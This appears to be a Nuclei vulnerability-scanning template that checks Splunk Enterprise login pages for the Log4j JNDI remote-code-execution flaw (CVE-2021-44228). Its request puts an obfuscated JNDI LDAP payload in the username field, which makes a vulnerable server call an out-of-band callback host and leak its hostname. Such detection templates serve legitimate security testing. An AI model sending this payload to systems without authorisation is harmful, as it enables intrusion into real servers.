71 lines
2.3 KiB
YAML
71 lines
2.3 KiB
YAML
id: splunk-enterprise-log4j-rce
|
|
|
|
info:
|
|
name: Splunk Enterprise - Remote Code Execution (Apache Log4j)
|
|
author: shaikhyaser
|
|
severity: critical
|
|
description: |
|
|
Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape.
|
|
reference:
|
|
- https://www.splunk.com/en_us/blog/bulletins/splunk-security-advisory-for-apache-log4j-cve-2021-44228.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2021-44228
|
|
cwe-id: CWE-77
|
|
cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: http.title:"Login - Splunk"
|
|
product: splunk
|
|
vendor: splunk
|
|
tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev
|
|
variables:
|
|
rand1: '{{rand_int(111, 999)}}'
|
|
rand2: '{{rand_int(111, 999)}}'
|
|
str: "{{rand_base(5)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /en-US/account/login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/javascript, text/html, application/xml, text/xml, /
|
|
X-Requested-With: XMLHttpRequest
|
|
Origin: {{RootURL}}
|
|
Referer: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
cval={{unix_time()}}&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&password={{str}}&return_to=%2Fen-US%2F
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: regex
|
|
part: interactsh_request
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
|
|
|
extractors:
|
|
- type: kval
|
|
kval:
|
|
- interactsh_ip
|
|
|
|
- type: regex
|
|
part: interactsh_request
|
|
group: 2
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
|
|
|
- type: regex
|
|
part: interactsh_request
|
|
group: 1
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
|
|
|
# digest: 490a004630440220710929465f8a77ba76bd194093d158488b54954b4cbbeb2494fa76f18edd861802203d0bc07faaf77ec5f71f05b8124d0e477e5b07f9b9d3c43e9ea2f23662f65e23:922c64590222798bb761d5b6d8e72950
|